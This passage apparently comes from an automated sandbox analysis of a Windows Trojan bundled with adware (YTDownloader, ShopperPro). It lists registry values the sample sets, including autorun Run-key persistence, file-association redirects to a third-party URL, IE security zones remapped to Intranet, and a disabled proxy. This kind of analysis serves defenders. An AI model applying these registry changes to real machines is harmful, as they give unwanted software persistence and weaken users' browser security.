"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 39 9B 09 53 BB 2F F1 33 DE 64 66 DA C9 32 83"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process net.exe:3464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 D7 F0 46 85 FD FB 76 D0 2A 55 8F CE 8C AB 22"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process net.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B D5 17 27 60 D5 B5 A3 0E C9 CF C6 F6 6E D4 B7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process net1.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 A7 D3 B6 3D AE AF ED 9E 2E 60 C7 07 0A 35 60"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process net1.exe:3552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 0D FA DC 14 DC 76 BD D5 A3 D9 53 D3 06 83 28"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process setup.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 FB 84 C4 1A 13 93 57 77 F0 B7 5F 64 41 9F 5D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm6.tmp\AccDownload.dll,"
The process setup.exe:3052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"
[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"
[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"
[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&LangID=x&Ext=%s"
[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"
"Version" = "1.0.8654.1177"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"UninstallString" = "%Program Files%\YTDownloader\YTDUninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&LangID=x&Ext=%s"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"
[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"Publisher" = "YTDownloader"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"
[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"
[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,"
[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"
[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 00 A7 10 39 BE 33 FF EB BF 36 A2 03 82 49 DC"
[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"
[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"
[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&LangID=x&Ext=%s&"
[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"
[HKCU\Software\YTDownloader]
"Version" = "1.0.8654.1177"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayIcon" = "%Program Files%\YTDownloader\YTDownloader.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"
[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"
[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"
[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"
[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayName" = "YTDownloader"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""
[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"
[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe]
"(Default)" = "%Program Files%\YTDownloader\YTDownloader.exe"
[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run automatically each time Windows boots, the Trojan adds the following entry pointing to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run automatically each time Windows boots, the Trojan adds the following entry pointing to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
